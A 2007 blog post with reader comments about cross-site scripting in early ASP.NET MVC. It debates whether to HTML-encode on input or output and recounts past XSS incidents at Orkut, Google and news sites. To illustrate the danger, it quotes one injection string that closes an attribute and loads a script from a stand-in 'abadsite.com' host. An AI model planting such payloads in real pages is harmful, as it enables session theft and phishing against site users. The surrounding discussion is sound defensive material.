Wednesday, December 19, 2007 -
Having a great discussion over on the ASP.NET MVC forums about Html-Encoding and what should be done about it. All-in-all it's a pretty good post and is rapidly making me see what working for Microsoft is all about :). Specifically the discussion centers around HTML-Encoding and when it should be dealt with. It's a volatile subject, for sure, but one which needs to be considered and discussed.
Cross-site Scripting Attacks
Cross-site scripting is on the rise and is a major security issue that web developers tend to ignore until it's too late:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits
It's amazing how smart the evil geeks are out there. Check out some of the exploits that are possible:
On November 8th, 2006 Rajesh Sethumadhavan discovered a Persistant vulnerability in the social network site Orkut which would make it possible for Orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the Orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th, Orkut fixed the vulnerability.
Two XSS vulnerabilities in Google.com website were identified and published by Yair Amit in December 2005. The vulnerabilities allowed an attacker to impersonate legitimate members of Google's services or to mount a phishing attack. This publication presented an obscure way to bypass common XSS countermeasures by using UTF-7 encoded payloads.
in August 2006, through a fake news summary which claimed President Bush appointed a 9 year old boy to be the chairperson of the Information Security Department. This claim was backed up with links to cbsnews.com and www.bbc.co.uk, both of which were vulnerable to separate XSS holes which allowed the attackers to inject an article of their choosing.
To see XSS in action try this sample (this is a test site btw, so feel free to hack it up):
You might be thinking "yah but that's me spoofing the page - how would that actually translate into an attack". Well here, click this link and see. This is a very typical phishing attack.
If you're freaked out right now, that's a good thing :). If you're wondering if all of your search forms are vulnerable, the answer is most likely.
XSS Considerations in ASP.NET MVC
HTML-Encoding (transforming text into special HTML characters to represent reserved characters, thus avoiding XSS attacks) has become increasingly important given that we don't have Server Controls to render output using ASP.NET MVC CTP #1. Traditionally, using ASP.NET, this was mitigated some by controls automatically encoding viewable text (attackers could still exploit attribute values like "href", "src" and "value" however).
Damien Guard wrote up a nice post on this issue:
If you don't encode data when using any of the following methods to output to HTML your application could be compromised by unexpected HTML turning up in the page and modifying everything from formatting though to capturing and interfering with form data via remote scripts (XSS). Such vulnerabilities are incredibly dangerous...
Just imagine post.Author contains "><script src="http://abadsite.com"></script> after an unscrupulous user entered that into a field your application uses and it got into the database. The following typical ASP.NET techniques would leave you open.
Indeed it's a very big deal, and one we need to take very seriously with ASP.NET MVC.
Discussion
The thing that sparked this discussion was the use of UpdateFrom() in the MVCTookit. By default we don't encode the values coming in from Request.Form, which means that when you post a value to a controller, the controller could, inadvertently, return that text to the browser (like with the search example above) and you'd be in trouble.
When the thread started, I initially replied that I would turn encoding on by default to avoid these scenarios, and offer an override for turning encoding off. As I quickly realized, people are just not in favor of this approach:
I agree with these points, but at the same time I recognize that XSS is a larger issue with MVC and more safeguards need to be put in place. Many developers (I'd say most) forget to turn on encoding at any level - and I've been guilty of it many, many times. To that end, enabling a level of protection by default seems to be a reasonable approach.
In addition, a developer may quickly find that for certain fields he needs to turn off encoding because the data going in is invalid. This is easily doable for individual fields that you need to search on, or fields that need to retain the raw HTML.
In summary - my opinion has been that "opt-out" is a reasonable choice in light of the threat - where you explicitly state that "I don't want these things encoded, thank you".
I do recognize that it's an extra step for most developers - but so is making sure that everything is encoded on the way back out. To me the extra steps should be to make the app less secure, not more.
This has always been at the core of any security discussion - how much work should added security impose? Damien adds a good point (posted in the forums):
Definitely do not encode it going into the database - to do so would pollute your data with HTML encoding. If you thought having presentation and model logic separate was important then imagine what stuffing HTML into the database would mean. If you ever wanted to show it via another application such as a WinForm, Console or XML variant you'll have to do cross-conversion. It would also mean that you can no longer HTML encode the output or you would double encode it and actually start displaying < in text boxes
It's important to recognize that in no way am I advocating storing HTML in your database as a rule - that would be irresponsible of me :).
Given Damien's scenario, I have to pose the question: it is better to have you, as the developer make the decision that "I need to use this data somewhere else so I will turn encoding off"? Or should it be off by default just in case this scenario happens?
It's more work to encode everything, is it worth it? You tell me :)!
What About <%=?
One idea brought up has to do with overriding the default <%= sugar that you can use on any ASP page (which translates to Response.Write) and making it encode every time, with an option for some other syntax like <%! to be used for unencoded strings.
There are some hurdles with this approach that Phil discusses on the thread:
Right now, the ASP.NET page parser converts <%= "Foo" %> to a call to Response.Write("Foo"); I don't think we want to change Response.Write() to default to HTML encoding because that would cause the entire page template to be an unencoded mess since literals within an aspx page are clumped together into Response.Write calls.
But he goes on with some possible thoughts:
1. Use the approach that Steve (last name?) does here. He effectively implements his own CSharpCodeCompiler to intercept the code generation phase I mentioned. Very neat approach.
2. Another theoretical approach (as in I think it would work, but I haven't tried it) is to hook in your own PageParserFilter. Ideally, this approach might allow for introducing an alternative syntax for unencoded HTML such as the <%!= Html.TextBox(...) %>
The next question is whether the ASP.NET team should make this the default behavior for ASP.NET MVC?
And this is where you come in. I'd love to hear from you about this issue. Specifically:
We've discussed this before, but I really think that there should be some sort of control model specific to MVC (ie. not directly based on Page - maybe a stripped down Page engine that explicitly supports only a limited functional both for controls and Page) so this stuff can be abstracted in a reusable and 'official' way, not with more markup tags that feel more like a bandaid.
Without this, this issue will always end up being troublesome because there's a lack of resuability and you constantly have to 'think' about XSS which is extremely hard to enforce.
Orkut's written in asp.net, but didn't take advantage of an asp.net feature that could mitigate that type of attack. Microsoft added a custom extension known as HttpOnly to cookies with IE6.01. This was designed to mitigate against authentication cookie theft, which is a common target of XSS. We've been using it in DotNetNuke for over 2 years (http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryID/256/Default.aspx ), and I was glad to see that Microsoft automatically adds the attribute to the forms auth cookie in asp.net 2.0 (as DotNetNuke uses multiple cookies we override the default behaviour and apply it to allow site cookies -something Orkut should have done), as it fixed this issue for IE users at least. After a few years of refusing to implement it (probably as they suspected that anything from Microsoft must be inherenting evil :) ), Firefox added support for it just in time to break one of my demos at devconnections.
I downloaded Microsoft's Anti-XSS Library and used the XmlEncode method and XmlAttribute encode methods in the view. To make it a little more fun, I created extension methods on System.String to wrap each of the "encode" methods. Now I can do things like <%= item.Title.XmlEncode() %gt; I like it.
Saving data encoded means more overhead processing takes a bit more time.
Encoding on the way out makes sence for a few options.
Not saving html for search also makes some sence in terms of performance.
Think html editor fields.
Frankly, I don't like the idea of inbound encoding either, for all the good practical reasons mentionned, and also for more abstract, conceptual reasons. For me, preventing attacks and encoding text are two different concerns and should not be merged into one single thing.
What I would expect from the ASP.NET framework by default is some kind of exception thrown when an attempt to inject active content is detected - with an override in case I want to implement my own detection code or skip this detection altogether.
In these cases, which are going to be common in any enterprise application, as Phillip said, people trained to not encode on out by the default being on in, are not going to catch any attacks in the data.
s = s.Replace("", " > ").Replace(" ", " ").Trim();
Also, I normally allow only one type of quote (single / double / grave accent) inside the user input on the way in (to avoid problems with SQL).
Would I beleive in techno magic, I could imagine a new Page method
bool IsOutputSafe(string output)
with a bunch of events like "Mixed quotes", "Output contains HTML tags", "JavaScript entry discovered", "Cross domain src attribute found", etc. This is a kind of SAX parser which evaluates the output against existing Page context and warns that HTML flow can be broken or harmfully extended. Thus, the developer can make a decision what to do at each point.
I agree with Richard on this one. Encode by default on the way out. Give me a way to turn it off/override if needed. There are many scenarios where data comes into the database from other sources and/or the data is rendered in a format other than HTML. The only time you can be 99% sure the data is rendering to HTML is during the rendering of the view.
Also, let's say the ASP.NET team encodes the input by default. Now if I want to be consistent when I save data in the same database tables from my WinForms app, I've got to reference System.Web to use the HttpServerUtility class in my WinForms app. Things are starting to smell at that point.
Ok, you could turn off the default implementation, and explicitly encode every item you render during output, but it requires a lot more work for something that could be handled by the framework.
This leads me to another suggestion. How about allowing it to be configured either way (on input or output)? Then I could easily choose my preferred method and I couldn't care less about which way is the default.
Even if you have a default implicit behavior, you should make it easy to override.
2.) I prefer NOT encoding input by default.
As has already been discussed, developers will typically use the defaults and store encoded data which doesn't make sense outside of web applications.
My company's web application accepts data imported from other sources. I can't assume that any of it is safe. If one of these sources uses ASP.NET MVC with default input encoding, I am going to double-encode it.
3.) I prefer that we DO encode output by default.
Data can come from many sources; bad/evil data come doesn't only come from the website.
Again, my company's web application accepts data imported from other sources. I can't assume that any of it is safe so I need to make sure that it is encoded before it is displayed.
I like the idea of adding a default encoding inline syntax similiar to, but not identical to the current inline syntax, but I'm not sure if it would be used with so many developers familiar with the current inline syntax. Will they change their current habits to be more secure? Maybe.
I like the idea of MVC controls better. As stated by Rick Strahl and others above, this allows many benefits above and beyond resolving the encoding issue.
Reading many of the code samples for MVC, I'm concerned that the inline code has lost the elegance that ASP.NET controls offered to better encapsulate behaviors. I also think that using ASPX controls seems wrong, too, since they have different page lifecycles than an MVC control should.
Maybe both approaches would be best of all: MVC controls and an alternate inline syntax?